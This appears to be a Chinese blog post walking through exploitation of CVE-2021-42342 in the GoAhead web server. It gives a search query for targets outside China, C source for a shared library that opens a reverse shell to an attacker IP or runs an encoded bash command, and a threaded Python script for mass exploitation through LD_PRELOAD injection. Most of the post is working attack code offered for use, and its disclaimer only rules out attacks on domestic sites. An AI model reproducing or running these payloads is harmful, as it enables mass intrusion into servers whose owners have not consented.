Goahead的Nday漏洞复现利用及批量

前言：好久没写文章了，挑了一下难复现的文章来进行复现。并写了一个批量。坑主要在socket发送post包和断点注入那块。

**0x01 goahead漏洞介绍
**

1、漏洞编号
CVE-2021-42342

2、影响版本

GoAhead web-server=4.x  
5.x<=GoAhead web-server<5.1.5

3、fofa
app="Goahead" && country!="CN"

**0x02 制作so文件
**

1、编译命令

gcc -s -shared -fPIC ./name.c -o name.so

2、制作反弹shell的so文件

`#include<stdio.h>``#include<stdlib.h>``#include<sys/socket.h>``#include<netinet/in.h>``   ``char *server_ip="ip";``uint32_t server_port=5555;``   ``static void zhrmghgws(void) __attribute__((constructor));``static void zhrmghgws(void)``{``   `    `int sock = socket(AF_INET, SOCK_STREAM, 0);`    `struct sockaddr_in attacker_addr = {0};`    `attacker_addr.sin_family = AF_INET;`    `attacker_addr.sin_port = htons(server_port);`    `attacker_addr.sin_addr.s_addr = inet_addr(server_ip);``   `    `if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)`        `exit(0);``   `    `dup2(sock, 0);`    `dup2(sock, 1);`    `dup2(sock, 2);``   `    `execve("/bin/bash", 0, 0);``}`

3、制作命令执行的so文件

`#include <stdio.h>``#include <stdlib.h>``static void zhrmghgws(void) __attribute__((constructor));``static void zhrmghgws(void)``{`  `system("bash -c '{echo,bash编码值}|{base64,-d}|{bash,-i}'");``}``   `

**

0x03 漏洞利用
**

1、执行编写好的脚本

2、脚本批量

`#!/usr/bin/env python``# -*- encoding: utf8 -*-``from crypt import methods``import re``from types import SimpleNamespace``import requests``from bs4 import BeautifulSoup``import base64``import warnings``import random``import sys``import socket``import os``import argparse``import threading``from urllib.parse import urlparse, ParseResult``import json``import urllib3``import urllib``import queue``import ssl``import string``from time import sleep``urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)``   ``   ``   ``#搜索存活主机``purp = '\033[95m'``blue = '\033[94m'``red = '\033[31m'``yellow = '\033[93m'``green = '\033[96m'``end = '\033[0m'``   ``def title():`    `print("""``   ``   ``   `                   `_______      ________    ___   ___ ___  __        _  _ ___  ____  _  _ ___``                   / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |__ \|___ \| || |__ \  ``                 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_ ) | __) | || |_ ) |`                 `| |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _/ / |__ <|__   _/ /``                  | |____   \  /  | |____    / /_| |_| / /_ | |         | |/ /_ ___) |  | |/ /_  ``                  \_____|   \/   |______|  |____|\___/____||_|         |_|____|____/   |_|____|`                                                                               `   ``   ``   `                                                                    `www.bolean.com.cn`                                                                                        `""")`    `print('''`                                                        `批量访问模式：python3 cve-2021-42342.py -f XXX.txt -t threads`                                                        `单一访问模式：python3 cve-2022-42342.py -u http://xxx.com`                                                        `author:thRee``   ``   `        `''')``   ``   ``q_file = queue.Queue()``q_path = ["cgi-bin/index"]``PAYLOAD_MAX_LENGTH = 16384 - 200``   ``def genRandomString(slen=10):`    `return ''.join(random.sample(string.ascii_letters, slen))``   ``def color(info):`    `return "[" + info + "]"``   ``def put_queue(file_apth, q):`    `with open(file_apth, 'r', encoding='utf8') as f:`        `while True:`            `row = f.readline()`            `if not row:`                `return`            `q.put_nowait(row)``   ``def get_queue(q):`    `pass``   ``   ``def exploit(client, parts: ParseResult, payload: bytes):`    `path = '/' if not parts.path else parts.path`    `boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))`    `padding = 'a' * 2000`    `content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)`    `data = fr'''POST {path} HTTP/1.1``Host: {parts.hostname}``Accept-Encoding: gzip, deflate``Accept: */*``Accept-Language: en``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36``Connection: close``Content-Type: multipart/form-data; boundary={boundary}``Content-Length: {content_length}``   ``--{boundary}``Content-Disposition: form-data; name="LD_PRELOAD";``   ``/proc/self/fd/7``--{boundary}``Content-Disposition: form-data; name="data"; filename="1.txt"``Content-Type: text/plain``   ``#payload#{padding}``--{boundary}--``'''.replace('\n', '\r\n')`    `data = data.encode().replace(b'#payload#', payload)`    `client.send(data)`    `resp = client.recv(20480)`    `resp = resp.decode()`    `return data,resp,path``   ``   ``def requ(url,payload):  # 请求目标url`    `for path in q_path:`        `if url[:4] != 'http':`            `uroo = "http://"  + url +  "/" + path`            `urooo = "https://" + url +  "/" +path`            `ur = [uroo,urooo]`        `else:`            `uroo = url + "/" + path``            ur = [uroo]`        `for uri in ur:`            `try:`                `if len(payload) > PAYLOAD_MAX_LENGTH:`                    `raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)``   `                `parts = urlparse(uri)`                `port = parts.port`                `if not parts.port:`                    `if parts.scheme == 'https':`                        `port = 443`                    `else:`                        `port = 80`                `context = ssl.create_default_context()`                `with socket.create_connection((parts.hostname, port), timeout=8) as client:`                    `if parts.scheme == 'https':`                        `with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:`                            `print(ssock)`                            `resp1=exploit(ssock, parts, payload)`                            `print("OK",uri)``   `                    `else:`                        `print(client)``   `                        `resp1=exploit(client, parts, payload)`                        `print("[-]",uri)`            `except Exception as ex:`                `pass`                `print(uri)`                `def run(url=None):`    `if not url:`        `while not q_file.empty():`            `try:`                `with open("name.so", 'rb') as f:`                    `payload = f.read()`                `requ(q_file.get_nowait().strip(),payload)`            `except Exception as e:`                `pass`                `#print("[-]ERROR:" , str(e),url)`                `return`    `else:`        `with open("name.so", 'rb') as f:`            `payload = f.read()`        `requ(url,payload)``if __name__ == '__main__':`    `title()`    `parser = argparse.ArgumentParser(description="cve-2021-42342")`    `parser.add_argument('-u', '--url', type=str, help="url")`    `parser.add_argument('-f', '--file', type=str, help="url file path")`    `parser.add_argument('-t', '--threading', type=int, help="threading", default=5)`    `args = parser.parse_args()``   `    `if args.file:`        `put_queue(args.file, q_file)`        `th = args.threading`        `ts = []`        `for n in range(th):`            `t = threading.Thread(target=run)`            `t.start()`            `ts.append(t)`        `for t in ts:`            `t.join()`    `elif args.url:`        `run(url=args.url)`

看了一下tw，别人验证漏洞存不存在的时候扫描了一万个，一个都没中。。。

这洞感觉也就自我安慰一下，利用条件太苛刻,我还没批量跑过。

这里有片P牛写的踩坑文章可以看一下。

https://www.leavesongs.com/PENETRATION/goahead-en-injection-cve-2021-42342.html

老规矩，禁止在未授权的情况下对国内网站进行漏洞利用测试，我不负刑事责任，跟我没有任何关系！

end

下期预告

投稿方式

欢迎投稿并加入我们，请联系公众号：Golden-Qianjiang

 金色钱江,讲述杭州IT精英的成长之路!

 关注金色钱江,体验全能技术王者之路!